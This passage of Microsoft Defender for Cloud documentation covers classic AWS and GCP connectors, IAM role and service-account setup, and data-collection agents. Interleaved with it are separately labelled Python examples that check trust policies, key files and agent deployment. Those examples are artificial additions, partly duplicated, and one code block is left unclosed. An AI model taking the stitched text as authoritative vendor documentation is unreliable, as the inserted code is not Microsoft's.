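def route(payload_json: str, severities: Iterable[str], title_contains: Optional[str] = None) -> list:
    """Parse the raw event and return (title, k8s scope) for every alert that
    would have fired the automation. The generic HTTP connector hands over
    the body as-is, so parsing and filtering both happen here."""
    alerts = json.loads(payload_json)
    if isinstance(alerts, dict):          # a single alert rather than a batch
        alerts = [alerts]
    return [
        (a["AlertDisplayName"], k8s_scope(a.get("AlertType", "")))
        for a in alerts
        if matches_rule(a, severities, title_contains)
    ]


if __name__ == "__main__":
    print(route(SAMPLE_ALERTS_JSON, {"High", "Medium"}, "SQL"))
    print(route(SAMPLE_ALERTS_JSON, {"High"}))
```

With the constructed payload, the "SQL" rule over High and Medium alerts selects only Potential SQL Injection, while a High-only rule with no title filter selects three alerts, one of them classified as a K8S.NODE_ workload alert.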


Next steps

In this article, you learned about creating logic apps, automating their execution in Defender for Cloud, and running them manually. For more information, see the following documentation:

- Use workflow automation to automate a security response
- Security recommendations in Microsoft Defender for Cloud
- Security alerts in Microsoft Defender for Cloud
- Workflow automation data types schemas
- Check out common questions about Defender for Cloud.


Manage classic cloud connectors (retired)

Article 07/12/2023

The retired classic cloud connector requires configuration in your Google Cloud Platform (GCP) project or Amazon Web Services (AWS) account to create a user that Microsoft Defender for Cloud can use to connect to your GCP project or AWS environment. The classic connector is available only to customers who previously used it to connect GCP projects or AWS environments.

To connect a GCP project or an AWS account, you should use the native connector available in Defender for Cloud.

Connect your AWS account by using the classic connector

Prerequisites

To complete the procedures for connecting an AWS account, you need:

- A Microsoft Azure subscription. If you don't have an Azure subscription, you can sign up for a free one.
- Microsoft Defender for Cloud enabled on your Azure subscription.
- Access to an AWS account.
- Owner permission on the relevant Azure subscription. A Contributor can also connect an AWS account if an Owner provides the service principal details.


Set up AWS Security Hub

To view security recommendations for multiple regions, repeat the following steps for each relevant region.

If you're using an AWS management account, repeat the following steps to configure the management account and all connected member accounts across all relevant regions.

1. Enable AWS Config.

2. Enable AWS Security Hub.

3. Verify that data is flowing to Security Hub. When you first enable Security Hub, the data might take several hours to become available.


Set up authentication for Defender for Cloud in AWS

There are two ways to allow Defender for Cloud to authenticate to AWS:

- Create an identity and access management (IAM) role for Defender for Cloud: The more secure and recommended method.
- Create an AWS user for Defender for Cloud: A less secure option if you don't have IAM enabled.


Create an IAM role for Defender for Cloud 


1. From your Amazon Web Services console, under Security, Identity & Compliance, 
select IAM. 


2. Select Roles > Create role. 


3. Select Another AWS account.

4. Enter the following details:

- For Account ID, enter the Microsoft account ID 158177204117, as shown on the AWS connector page in Defender for Cloud.
- Select Require External ID.
- For External ID, enter the subscription ID, as shown on the AWS connector page in Defender for Cloud.

The external ID is what ties the trust to your subscription: without it, any other tenant able to make the same Microsoft service assume roles could point it at your account (the confused-deputy problem).

5. Select Next.

6. In the Attach permission policies section, select the following AWS managed policies:

- SecurityAudit (arn:aws:iam::aws:policy/SecurityAudit)
- AmazonSSMAutomationRole (arn:aws:iam::aws:policy/service-role/AmazonSSMAutomationRole)
- AWSSecurityHubReadOnlyAccess (arn:aws:iam::aws:policy/AWSSecurityHubReadOnlyAccess)

7. Optionally, add tags. Adding tags to the role doesn't affect the connection.

8. Select Next.

9. In the Roles list, choose the role that you created.

10. Save the Amazon Resource Name (ARN) for later.
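The console steps above produce a role trust policy; what makes it safe to trust an account you do not control is the sts:ExternalId condition. The following is an added example, not code from the Microsoft documentation or the AWS console: it builds the trust policy the "Another AWS account" plus "Require External ID" choices result in, checks an existing trust policy for the weaker variants (no external ID, empty external ID, wildcard principal), and lists which of the three managed policies from step 6 are still missing. The trusted account ID and the policy ARNs are taken from the steps above; the external ID value in the usage block is a placeholder for the subscription ID shown on the connector page.

```python
"""Build and check the IAM role trust policy that the "Another AWS account"
and "Require External ID" steps above produce.

Added example, not code from the Microsoft documentation or the AWS console.
The trusted account ID and the three managed policy ARNs are taken from the
steps above; the external ID used in __main__ is a placeholder for the
subscription ID shown on the connector page.
"""
import json
from typing import List

MICROSOFT_ACCOUNT_ID = "158177204117"

REQUIRED_MANAGED_POLICIES = frozenset({
    "arn:aws:iam::aws:policy/SecurityAudit",
    "arn:aws:iam::aws:policy/service-role/AmazonSSMAutomationRole",
    "arn:aws:iam::aws:policy/AWSSecurityHubReadOnlyAccess",
})


def trust_policy(external_id: str, trusted_account: str = MICROSOFT_ACCOUNT_ID) -> dict:
    """Trust policy equivalent to the console choices: trust the root of the
    given account, but only when the caller presents the expected external
    ID. The condition is what prevents a third party who can also drive the
    trusted service from assuming this role (confused deputy)."""
    return {
        "Version": "2012-10-17",
        "Statement": [{
            "Effect": "Allow",
            "Principal": {"AWS": f"arn:aws:iam::{trusted_account}:root"},
            "Action": "sts:AssumeRole",
            "Condition": {"StringEquals": {"sts:ExternalId": external_id}},
        }],
    }


def _as_list(value) -> list:
    """IAM allows a string or a list in Action and Principal fields."""
    return value if isinstance(value, list) else [value]


def check_trust_policy(doc: dict) -> List[str]:
    """Return findings for every AssumeRole grant that is weaker than the
    procedure above requires. An empty list means the policy is as expected."""
    findings = []
    for i, stmt in enumerate(doc.get("Statement", [])):
        if stmt.get("Effect") != "Allow":
            continue
        if "sts:AssumeRole" not in _as_list(stmt.get("Action", [])):
            continue
        principal = stmt.get("Principal", {})
        aws_principal = principal if isinstance(principal, str) else principal.get("AWS", "")
        if "*" in _as_list(aws_principal):
            findings.append(f"statement {i}: wildcard principal")
        condition = stmt.get("Condition", {}).get("StringEquals", {})
        if "sts:ExternalId" not in condition:
            findings.append(f"statement {i}: sts:AssumeRole without sts:ExternalId condition")
        elif not condition["sts:ExternalId"]:
            findings.append(f"statement {i}: empty sts:ExternalId")
    return findings


def missing_managed_policies(attached_arns) -> List[str]:
    """Managed policies from step 6 that are not attached to the role yet."""
    return sorted(REQUIRED_MANAGED_POLICIES - set(attached_arns))


if __name__ == "__main__":
    doc = trust_policy("00000000-0000-0000-0000-000000000000")  # placeholder subscription ID
    print(json.dumps(doc, indent=2))
    print("findings:", check_trust_policy(doc))
    print("missing:", missing_managed_policies(["arn:aws:iam::aws:policy/SecurityAudit"]))
```

Feed check_trust_policy the JSON from the role's Trust relationships tab (for example the output of aws iam get-role) when reviewing an existing connector role; a role created with the "Another AWS account" option but without "Require External ID" comes back with the missing-condition finding.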


Create an AWS user for Defender for Cloud

1. Open the Users tab and select Add user.

2. In the Details step, enter a username for Defender for Cloud. Select Programmatic access for the AWS access type.

3. Select Next: Permissions.

4. Select Attach existing policies directly and apply the following policies:

- SecurityAudit
- AmazonSSMAutomationRole
- AWSSecurityHubReadOnlyAccess

5. Select Next: Tags. Optionally, add tags. Adding tags to the user doesn't affect the connection.

6. Select Review.

7. Save the automatically generated Access key ID and Secret access key CSV files for later.

8. Review the summary, and then select Create user.


Configure the SSM Agent

AWS Systems Manager (SSM) is required for automating tasks across your AWS resources. If your EC2 instances don't have the SSM Agent, follow the relevant instructions from Amazon:

- Installing and Configuring SSM Agent on Windows Instances
- Installing and Configuring SSM Agent on Amazon EC2 Linux Instances


Complete the Azure Arc prerequisites

1. Make sure the appropriate Azure resource providers are registered:

- Microsoft.HybridCompute
- Microsoft.GuestConfiguration

2. As an Owner on the subscription that you want to use for onboarding, create a service principal for Azure Arc onboarding, as described in Create a service principal for onboarding at scale.


Connect AWS to Defender for Cloud 


1. From the Defender for Cloud menu, open Environment settings. Then select the 
option to switch back to the classic connectors experience. 


2. Select Add AWS account. 


3. Configure the options on the AWS authentication tab:

a. For Display name, enter a name for the connector.

b. For Subscription, confirm that the value is correct. It's the subscription that includes the connector and AWS Security Hub recommendations.

c. Depending on the authentication option that you chose when you set up authentication for Defender for Cloud in AWS, take one of the following actions:

- For Authentication method, select Assume Role. Then, for AWS role ARN, paste the ARN that you got when you created an IAM role for Defender for Cloud.



e For Authentication method, select Credentials. Then, in the relevant 
boxes, paste the access key and secret key from the CSV files that you 
saved when you created an AWS user for Defender for Cloud. 


4. Select Next. 
5. Configure the options on the Azure Arc Configuration tab. 


Defender for Cloud discovers the EC2 instances in the connected AWS account and 
uses SSM to onboard them to Azure Arc. For the list of supported operating 
systems, see What operating systems for my EC2 instances are supported? in the 


common questions. 


a. For Resource Group and Azure Region, select the resource group and region 
that the discovered AWS EC2s will be onboarded to in the selected subscription. 


b. Enter the Service Principal ID and Service Principal Client Secret values for 
Azure Arc, as described in Create a service principal for onboarding at scale. 


c. If the machine is connecting to the internet via proxy server, specify the proxy 
server IP address, or the name and port number that the machine uses to 
communicate with the proxy server. Enter the value in the format 


http: //<proxyURL>:<proxyport>. 
d. Select Review + create. 


6. Review the summary information. 


The Tags section lists all Azure tags that are automatically created for each onboarded EC2 instance. Each tag has its own relevant details, so you can easily recognize it in Azure. Learn more about Azure tags in Use tags to organize your Azure resources and management hierarchy.
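The Assume Role option in step 3 only works because the IAM role trusts Microsoft's AWS account and requires the External ID (your subscription ID) on every sts:AssumeRole call. The following is an added example, not code from Microsoft or AWS: it builds that trust policy in the standard AWS policy-document shape and reviews an existing one for the two weaknesses a defender should look for (wildcard principal, missing or mismatched external ID). The Microsoft account ID 158177204117 is the one shown in the connector form; the subscription ID and the ARN in the usage are constructed placeholders.

```python
import json
import re

# Microsoft's AWS account ID as shown in the connector form above; the
# subscription ID used as External ID in the usage is a constructed placeholder.
MICROSOFT_ACCOUNT_ID = "158177204117"
ROLE_ARN_RE = re.compile(r"^arn:aws:iam::(\d{12}):role/[\w+=,.@/-]+$")


def build_trust_policy(external_id, trusted_account_id=MICROSOFT_ACCOUNT_ID):
    """Trust policy for the IAM role whose ARN is pasted into 'AWS role ARN'.

    Only the trusted account may call sts:AssumeRole, and only when it presents
    the external ID (the Azure subscription ID), which closes the confused-deputy
    case where someone else's connector is pointed at your role.
    """
    return {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Effect": "Allow",
                "Principal": {"AWS": f"arn:aws:iam::{trusted_account_id}:root"},
                "Action": "sts:AssumeRole",
                "Condition": {"StringEquals": {"sts:ExternalId": external_id}},
            }
        ],
    }


def trust_policy_findings(policy, external_id):
    """Review an existing trust policy; an empty list means it has the expected shape."""
    findings = []
    for stmt in policy.get("Statement", []):
        if stmt.get("Effect") != "Allow":
            continue
        actions = stmt.get("Action", [])
        actions = [actions] if isinstance(actions, str) else actions
        if not any(a in ("sts:AssumeRole", "sts:*", "*") for a in actions):
            continue
        principal = stmt.get("Principal", {})
        aws_principal = principal.get("AWS") if isinstance(principal, dict) else principal
        if aws_principal == "*":
            findings.append("any AWS principal may assume the role")
        elif aws_principal != f"arn:aws:iam::{MICROSOFT_ACCOUNT_ID}:root":
            findings.append(f"unexpected principal: {aws_principal}")
        condition = stmt.get("Condition", {}).get("StringEquals", {})
        if condition.get("sts:ExternalId") != external_id:
            findings.append("sts:ExternalId condition missing or not equal to the subscription ID")
    return findings


def is_valid_role_arn(arn):
    """Cheap format check before pasting the ARN into the connector form."""
    return ROLE_ARN_RE.match(arn) is not None


if __name__ == "__main__":
    subscription_id = "00000000-0000-0000-0000-000000000000"  # constructed placeholder
    policy = build_trust_policy(subscription_id)
    print(json.dumps(policy, indent=2))
    print("findings:", trust_policy_findings(policy, subscription_id))
```

Run the review function against the trust policy of the role you actually created (for example, the JSON returned by the AWS console or CLI) before finishing the connector; a wildcard principal or an absent external-ID condition means the role can be assumed by parties other than your Defender for Cloud tenant.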


Confirm the connection 
After you successfully create the connector and properly configure AWS Security Hub: 


- Defender for Cloud scans the environment for AWS EC2 instances and onboards them to Azure Arc. You can then install the Log Analytics agent and get threat protection and security recommendations.


- The Defender for Cloud service scans for new AWS EC2 instances every 6 hours and onboards them according to the configuration.


- The AWS CIS standard appears in the regulatory compliance dashboard in Defender for Cloud.


- If a Security Hub policy is enabled, recommendations appear in the Defender for Cloud portal and the regulatory compliance dashboard 5 to 10 minutes after onboarding finishes.


[Screenshot: Microsoft Defender for Cloud > Recommendations, filtered to Environment: AWS. Controls shown include Enable MFA, Restrict unauthorized network access, and Manage access and permissions, with AWS recommendations such as hardware MFA for the "root" account, restricting all traffic on the VPC default security group, rotating access keys every 90 days or less, no root account access key, and Lambda functions restricting public access, each with its unhealthy resource count.]


Remove classic AWS connectors 


To remove any connectors that you created by using the classic connectors experience: 


1. Sign in to the Azure portal.
2. Go to Defender for Cloud > Environment settings.


3. Select the option to switch back to the classic connectors experience. 


[Screenshot: Microsoft Defender for Cloud > Environment settings, listing Azure subscriptions and AWS (preview) connectors with their total resources, Defender coverage and standards (for example, AWS CIS 1.2.0 (preview), AWS Foundational Security Best Practices), and the link "To switch back to the classic cloud connectors experience, click here."]

4. For each connector, select the ellipsis (...) button at the end of the row, and then 
select Delete. 


5. On AWS, delete the IAM role (the one whose ARN you used) or the credentials created for the integration.


Connect your GCP project by using the classic connector


Create a connector for every organization that you want to monitor from Defender for 
Cloud. 


When you're connecting GCP projects to specific Azure subscriptions, consider the Google Cloud resource hierarchy and these guidelines:


- You can connect your GCP projects to Defender for Cloud at the organization level.
- You can connect multiple organizations to one Azure subscription.
- You can connect multiple organizations to multiple Azure subscriptions.
- When you connect an organization, all projects within that organization are added to Defender for Cloud.


Prerequisites 
To complete the procedures for connecting a GCP project, you need: 


- A Microsoft Azure subscription. If you don't have an Azure subscription, you can sign up for a free one.
- Microsoft Defender for Cloud enabled on your Azure subscription.
- Access to a GCP project.
- The Owner or Contributor role on the relevant Azure subscription.


You can learn more about Defender for Cloud pricing on the pricing page.


Set up GCP Security Command Center with Security Health Analytics


For all the GCP projects in your organization, you must: 


1. Set up GCP Security Command Center by using these instructions from the GCP documentation.
2. Enable Security Health Analytics by using these instructions from the GCP documentation.
3. Verify that data is flowing to Security Command Center.


The instructions for connecting your GCP environment for security configuration follow Google's recommendations for consuming security configuration recommendations. The integration uses Google Security Command Center and consumes extra resources that might affect your billing.


When you first enable Security Health Analytics, the data might take several hours to 
become available. 


Enable the GCP Security Command Center API 


1. Go to Google's Cloud Console API Library. 


2. Select each project in the organization that you want to connect to Microsoft 
Defender for Cloud. 


3. Find and select Security Command Center API. 


4. On the API's page, select ENABLE. 


Learn more about the Security Command Center API.


Create a dedicated service account for the security configuration integration


1. On the GCP console, select a project from the organization in which you're creating the required service account.

Note

When you add this service account at the organization level, it will be used to access the data that Security Command Center gathers from all of the other enabled projects in the organization.

2. In the IAM & admin section of the left menu, select Service accounts. 

3. Select CREATE SERVICE ACCOUNT. 

4. Enter an account name, and then select Create. 

5. Specify Role as Defender for Cloud Admin Viewer, and then select Continue. 


6. The Grant users access to this service account section is optional. Select Done. 


7. Copy the Email value information for the created service account, and save it for 
later use. 


8. In the IAM & admin section of the left menu, select IAM, and then: 
a. Switch to the organization level. 
b. Select ADD. 


c. In the New members box, paste the Email value information that you copied 
earlier. 


d. Specify the role as Security Center Admin Viewer, and then select Save. 


[Screenshot: GCP IAM dialog "Add members to Project ABC". Caption: "Enter one or more members below. Then select a role for these members to grant them access to your resources. Multiple roles allowed." The New members box is shown with the role picker filtered to the Security Center Admin roles, the Viewer role described as "Read access to security center".]


Create a private key for the dedicated service account 
1. Switch to the project level. 
2. In the IAM & admin section of the left menu, select Service accounts. 
3. Open the dedicated service account, and then select Edit. 
4. In the Keys section, select ADD KEY > Create new key. 
5. On the Create private key pane, select JSON, and then select CREATE. 


6. Save this JSON file for later use. 
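The JSON file saved in step 6 is a long-lived credential for a service account that can read Security Command Center data for the whole organization, so it is worth checking before it is uploaded to the connector (and protected afterwards). The following is an added example, not Google's or Microsoft's code: it validates that a key file has the standard GCP service-account key fields and is not a user credential, and checks that the file is not group- or world-readable. The sample key is constructed, with a placeholder in place of a private key.

```python
import json
import os
import stat
from pathlib import Path

# Field names of a standard GCP service-account key JSON (assumed here, not quoted from the page).
REQUIRED_FIELDS = ("type", "project_id", "private_key_id", "private_key", "client_email", "token_uri")
SA_EMAIL_SUFFIX = ".iam.gserviceaccount.com"

# Constructed sample key: the private key is a placeholder, the project and account are invented.
SAMPLE_KEY = json.dumps({
    "type": "service_account",
    "project_id": "example-project",
    "private_key_id": "0123456789abcdef0123456789abcdef01234567",
    "private_key": "-----BEGIN PRIVATE KEY-----\nPLACEHOLDER\n-----END PRIVATE KEY-----\n",
    "client_email": "defender-sa@example-project.iam.gserviceaccount.com",
    "client_id": "000000000000000000000",
    "token_uri": "https://oauth2.googleapis.com/token",
})


def check_service_account_key(text):
    """Return the problems found in a key file's JSON; an empty list means it looks usable."""
    problems = []
    try:
        key = json.loads(text)
    except json.JSONDecodeError as exc:
        return [f"not valid JSON: {exc.msg}"]
    for field in REQUIRED_FIELDS:
        if not key.get(field):
            problems.append(f"missing field: {field}")
    if key.get("type") != "service_account":
        # An 'authorized_user' file is a person's OAuth credential, not the dedicated account.
        problems.append("type is not service_account")
    if not key.get("client_email", "").endswith(SA_EMAIL_SUFFIX):
        problems.append("client_email is not a service-account address")
    pem = key.get("private_key", "")
    if pem and not pem.startswith("-----BEGIN PRIVATE KEY-----"):
        problems.append("private_key is not a PEM private key")
    return problems


def key_file_is_private(path):
    """The file is a credential: it should be readable by its owner only (POSIX permissions)."""
    mode = stat.S_IMODE(os.stat(path).st_mode)
    return mode & (stat.S_IRWXG | stat.S_IRWXO) == 0


if __name__ == "__main__":
    print(check_service_account_key(SAMPLE_KEY))  # []
    key_path = Path("defender-sa-key.json")      # constructed path
    if key_path.exists():
        print("permissions ok:", key_file_is_private(key_path))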


Connect GCP to Defender for Cloud 


1. From the Defender for Cloud menu, open Environment settings. Then select the 
option to switch back to the classic connectors experience. 


[Screenshot: Microsoft Defender for Cloud > Environment settings, listing Azure subscriptions and AWS (preview) connectors with their total resources, Defender coverage and standards, and the link "To switch back to the classic cloud connectors experience, click here."]

2. Select Add GCP project. 
3. On the onboarding page: 
a. Validate the chosen subscription. 
b. In the Display name box, enter a display name for the connector. 


c. In the Organization ID box, enter your organization's ID. If you don't know it, see the Google guide Creating and managing organizations.


d. In the Private key box, browse to the JSON file that you downloaded when you 
created a private key for the dedicated service account. 


4. Select Next. 


Confirm the connection 


After you successfully create the connector and properly configure GCP Security 
Command Center: 


- The GCP CIS standard appears in the regulatory compliance dashboard in Defender for Cloud.
- Security recommendations for your GCP resources appear in the Defender for Cloud portal and the regulatory compliance dashboard 5 to 10 minutes after onboarding finishes.


[Screenshot: Recommendations page with "Group by controls" on. Controls listed with their unhealthy resource counts: Remediate vulnerabilities (42 of 63 resources), Enable encryption at rest (31 of 39), Remediate security configurations (29 of 38), Apply system updates (9 of 39), Apply adaptive application control (13 of 33), Enable auditing and logging (29 of 33). Under Enable auditing and logging: diagnostic-log recommendations for IoT Hub, Event Hub and Logic Apps, plus GCP recommendations such as "Ensure that sinks are configured for ..." (Preview) and "Ensure that the log metric filter and alerts exist for ..." (project ownership, audit configuration, custom roles, VPC, Cloud ...), each showing 3 of 3 GCP resources unhealthy.]


Remove classic GCP connectors 




To remove any connectors that you created by using the classic connectors experience: 


1. Sign in to the Azure portal.


2. Go to Defender for Cloud > Environment settings. 


3. Select the option to switch back to the classic connectors experience. 


[Screenshot: Microsoft Defender for Cloud > Environment settings, listing Azure subscriptions and AWS (preview) connectors with their total resources, Defender coverage and standards, and the link "To switch back to the classic cloud connectors experience, click here."]


4. For each connector, select the ellipsis (...) button at the end of the row, and then 
select Delete. 


Next steps 


- Protect all of your resources with Defender for Cloud


How does Defender for Cloud collect data?


Article · 08/03/2023


Defender for Cloud collects data from your Azure virtual machines (VMs), Virtual Machine Scale Sets, IaaS containers, and non-Azure (including on-premises) machines to monitor for security vulnerabilities and threats. Some Defender plans require monitoring components to collect data from your workloads.


Data collection is required to provide visibility into missing updates, misconfigured OS security settings, endpoint protection status, and health and threat protection. Data collection is only needed for compute resources such as VMs, Virtual Machine Scale Sets, IaaS containers, and non-Azure computers.


You can benefit from Microsoft Defender for Cloud even if you don't provision agents. 
However, you'll have limited security and the capabilities listed above aren't supported. 


Data is collected using: 


- Azure Monitor Agent (AMA)
- Microsoft Defender for Endpoint (MDE)
- Log Analytics agent
- Security components, such as the Azure Policy Add-on for Kubernetes


Why use Defender for Cloud to deploy monitoring components?


Visibility into the security of your workloads depends on the data that the monitoring 
components collect. The components ensure security coverage for all supported 
resources. 


To spare you from installing the extensions manually, Defender for Cloud reduces management overhead by installing all required extensions on existing and new machines. Defender for Cloud assigns the appropriate Deploy if not exists policy to the workloads in the subscription. This policy type ensures the extension is provisioned on all existing and future resources of that type.


Tip

Learn more about Azure Policy effects, including Deploy if not exists, in Understand Azure Policy effects.


What plans use monitoring components? 


These plans use monitoring components to collect data: 


- Defender for Servers
  - Azure Arc agent (for multicloud and on-premises servers)
  - Microsoft Defender for Endpoint
  - Vulnerability assessment
  - Azure Monitor Agent or Log Analytics agent
- Defender for SQL servers on machines
  - Azure Arc agent (for multicloud and on-premises servers)
  - Azure Monitor Agent or Log Analytics agent
  - Automatic SQL server discovery and registration
- Defender for Containers
  - Azure Arc agent (for multicloud and on-premises servers)
  - Defender profile, Azure Policy Extension, Kubernetes audit log data


Availability of extensions 


The Azure Preview Supplemental Terms include additional legal terms that apply to Azure features that are in beta, preview, or otherwise not yet released into general availability.


Azure Monitor Agent (AMA) 


Aspect | Details
Release state: | Preview
Relevant Defender plan: | - Security posture management (CSPM) (enabled by default) for Endpoint protection assessment; - Microsoft Defender for Servers Plan 2 for adaptive application controls, fileless attack detection, and file integrity monitoring
Required roles and permissions (subscription-level): | Owner
Supported destinations: | ✔ Azure virtual machines; ✔ Azure Arc-enabled machines
Policy-based: | ✔ Yes
Clouds: | ✔ Commercial clouds; ✖ Azure Government, Microsoft Azure operated by 21Vianet

Learn more about using the Azure Monitor Agent with Defender for Cloud.


Log Analytics agent 


Aspect | Azure virtual machines | Azure Arc-enabled machines
Release state: | Generally available (GA) | Generally available (GA)
Relevant Defender plan: | Foundational Cloud Security Posture Management (CSPM) for agent-based security recommendations; Microsoft Defender for Servers; Microsoft Defender for SQL | Foundational Cloud Security Posture Management (CSPM) for agent-based security recommendations; Microsoft Defender for Servers; Microsoft Defender for SQL
Required roles and permissions (subscription-level): | Owner | Owner
Supported destinations: | ✔ Azure virtual machines | ✔ Azure Arc-enabled machines
Policy-based: | ✖ No | ✔ Yes
Clouds: | ✔ Commercial clouds; ✔ Azure Government, Microsoft Azure operated by 21Vianet | ✔ Commercial clouds; ✖ Azure Government, Microsoft Azure operated by 21Vianet


Supported operating systems for the Log Analytics agent 


Defender for Cloud depends on the Log Analytics agent. Ensure your machines are running one of the supported operating systems for this agent as described on the following pages:


- Log Analytics agent for Windows supported operating systems
- Log Analytics agent for Linux supported operating systems


Also ensure your Log Analytics agent is properly configured to send data to Defender for Cloud.


Deploying the Log Analytics agent in cases of a pre-existing agent 
installation 


The following use cases explain how deployment of the Log Analytics agent works in 
cases when there's already an agent or extension installed. 


- Log Analytics agent is installed on the machine, but not as an extension (Direct agent) - If the Log Analytics agent is installed directly on the VM (not as an Azure extension), Defender for Cloud will install the Log Analytics agent extension and might upgrade the Log Analytics agent to the latest version. The installed agent will continue to report to its already configured workspaces and to the workspace configured in Defender for Cloud. (Multi-homing is supported on Windows machines.)

If the Log Analytics agent is configured with a user workspace and not Defender for Cloud's default workspace, you'll need to install the "Security" or "SecurityCenterFree" solution on it for Defender for Cloud to start processing events from VMs and computers reporting to that workspace.

For Linux machines, agent multi-homing isn't yet supported. If an existing agent installation is detected, the Log Analytics agent won't be deployed.

For existing machines on subscriptions onboarded to Defender for Cloud before 17 March 2019, when an existing agent is detected, the Log Analytics agent extension won't be installed and the machine won't be affected. For these machines, see the "Resolve monitoring agent health issues on your machines" recommendation to resolve the agent installation issues.


- System Center Operations Manager agent is installed on the machine - Defender for Cloud will install the Log Analytics agent extension side by side with the existing Operations Manager agent. The existing Operations Manager agent will continue to report to the Operations Manager server normally. The Operations Manager agent and Log Analytics agent share common run-time libraries, which will be updated to the latest version during this process.


- A pre-existing VM extension is present:
  - When the Monitoring Agent is installed as an extension, the extension configuration allows reporting to only a single workspace. Defender for Cloud doesn't override existing connections to user workspaces. Defender for Cloud will store security data from the VM in the workspace already connected, if the "Security" or "SecurityCenterFree" solution has been installed on it. Defender for Cloud may upgrade the extension version to the latest version in this process.
  - To see which workspace the existing extension is sending data to, run the TestCloudConnection.exe tool to validate connectivity with Microsoft Defender for Cloud, as described in Verify Log Analytics Agent connectivity. Alternatively, you can open Log Analytics workspaces, select a workspace, select the VM, and look at the Log Analytics agent connection.
  - If you have an environment where the Log Analytics agent is installed on client workstations and reporting to an existing Log Analytics workspace, review the list of operating systems supported by Microsoft Defender for Cloud to make sure your operating system is supported.


Learn more about working with the Log Analytics agent. 
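The three pre-existing-agent cases above decide both whether the extension gets installed and whether Defender for Cloud will actually process a machine's events, and the outcome depends on the OS, the subscription's onboarding date and the solutions installed on the workspace. The following is an added example, not Microsoft's code: it encodes those rules as a pure function so the expected result for a given fleet can be worked out before enabling autoprovisioning. The machine records are constructed; the Windows direct-agent case assumes Defender for Cloud is using its default workspace.

```python
from dataclasses import dataclass, field
from datetime import date
from typing import Optional

MULTIHOMING_CUTOFF = date(2019, 3, 17)            # onboarding cutoff stated in the text above
SECURITY_SOLUTIONS = {"Security", "SecurityCenterFree"}


@dataclass
class Machine:
    name: str
    os: str                                         # "Windows" or "Linux"
    direct_agent: bool = False                      # Log Analytics agent installed directly, not as an extension
    scom_agent: bool = False                        # System Center Operations Manager agent present
    existing_extension_workspace: Optional[str] = None   # workspace of a pre-existing agent extension
    workspace_solutions: set = field(default_factory=set)  # solutions installed on that workspace


@dataclass
class Outcome:
    deploy_extension: bool    # will Defender for Cloud install the Log Analytics agent extension?
    events_processed: bool    # will Defender for Cloud process this machine's security events?
    reason: str


def workspace_ready(solutions):
    """Defender for Cloud only processes events from a workspace with the Security or SecurityCenterFree solution."""
    return bool(set(solutions) & SECURITY_SOLUTIONS)


def plan_agent_deployment(m, subscription_onboarded):
    """Apply the pre-existing-agent rules; subscription_onboarded is an ISO date string (YYYY-MM-DD)."""
    onboarded = date.fromisoformat(subscription_onboarded)
    if m.existing_extension_workspace is not None:
        # The extension reports to exactly one workspace and that connection is not overridden.
        return Outcome(False, workspace_ready(m.workspace_solutions),
                       f"existing extension kept (version may be upgraded); data stays in {m.existing_extension_workspace}")
    if m.direct_agent:
        if onboarded < MULTIHOMING_CUTOFF:
            return Outcome(False, False,
                           "subscription onboarded before 17 March 2019: machine left unchanged; see the "
                           "'Resolve monitoring agent health issues on your machines' recommendation")
        if m.os == "Linux":
            return Outcome(False, False, "Linux: agent multi-homing not supported, existing agent detected")
        # Assumes Defender for Cloud's default workspace, so the multi-homed agent's events are processed.
        return Outcome(True, True, "Windows: extension installed, agent also reports to the Defender for Cloud workspace")
    if m.scom_agent:
        return Outcome(True, True, "extension installed side by side with the Operations Manager agent; shared runtime libraries updated")
    return Outcome(True, True, "no agent present: extension installed")


if __name__ == "__main__":
    fleet = [  # constructed sample inventory
        Machine("web-01", "Windows", direct_agent=True),
        Machine("db-01", "Linux", direct_agent=True),
        Machine("app-01", "Windows", existing_extension_workspace="ops-ws", workspace_solutions={"Updates"}),
        Machine("app-02", "Windows", scom_agent=True),
    ]
    for machine in fleet:
        outcome = plan_agent_deployment(machine, "2021-01-01")
        print(f"{machine.name}: deploy={outcome.deploy_extension} processed={outcome.events_processed} ({outcome.reason})")
```

The machine that is silently not covered is the one with a pre-existing extension pointed at a workspace without the security solution: nothing is installed and nothing is processed, yet the portal shows an agent present. That is the case to look for when recommendations for a host fail to appear.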


Microsoft Defender for Endpoint 


Aspect | Linux | Windows
Release state: | Generally available (GA) | Generally available (GA)
Relevant Defender plan: | Microsoft Defender for Servers | Microsoft Defender for Servers
Required roles and permissions (subscription-level): | Contributor or Security Admin | Contributor or Security Admin
Supported destinations: | ✔ Azure Arc-enabled machines; ✔ Azure virtual machines | ✔ Azure Arc-enabled machines; ✔ Azure VMs running Windows Server 2022, 2019, 2016, 2012 R2, 2008 R2 SP1, Azure Virtual Desktop, Windows 10 Enterprise multi-session; ✖ Azure VMs running Windows 10
Policy-based: | ✖ No | ✖ No
Clouds: | ✔ Commercial clouds; ✖ Azure Government, Microsoft Azure operated by 21Vianet | ✔ Commercial clouds; ✔ Azure Government, Microsoft Azure operated by 21Vianet


Learn more about Microsoft Defender for Endpoint. 


Vulnerability assessment 


Aspect | Details
Release state: | Generally available (GA)
Relevant Defender plan: | Microsoft Defender for Servers
Required roles and permissions (subscription-level): | Owner
Supported destinations: | ✔ Azure virtual machines; ✔ Azure Arc-enabled machines
Policy-based: | ✔ Yes
Clouds: | ✔ Commercial clouds; ✖ Azure Government, Microsoft Azure operated by 21Vianet


Guest Configuration


Aspect | Details
Release state: | Preview
Relevant Defender plan: | No plan required
Required roles and permissions (subscription-level): | Owner
Supported destinations: | ✔ Azure virtual machines
Clouds: | ✔ Commercial clouds; ✖ Azure Government, Microsoft Azure operated by 21Vianet


Learn more about Azure's Guest Configuration extension. 


Defender for Containers extensions 


This table shows the availability details for the components that are required by the protections offered by Microsoft Defender for Containers.

By default, the required extensions are enabled when you enable Defender for Containers from the Azure portal.


Aspect | Azure Kubernetes Service clusters | Azure Arc-enabled Kubernetes clusters
Release state: | Defender profile: GA; Azure Policy add-on: Generally available (GA) | Defender extension: Preview; Azure Policy extension: Preview
Relevant Defender plan: | Microsoft Defender for Containers | Microsoft Defender for Containers
Required roles and permissions (subscription-level): | Owner or User Access Administrator | Owner or User Access Administrator
Supported destinations: | The AKS Defender profile only supports AKS clusters that have RBAC enabled. | See Kubernetes distributions supported for Arc-enabled Kubernetes
Policy-based: | ✔ Yes | ✔ Yes
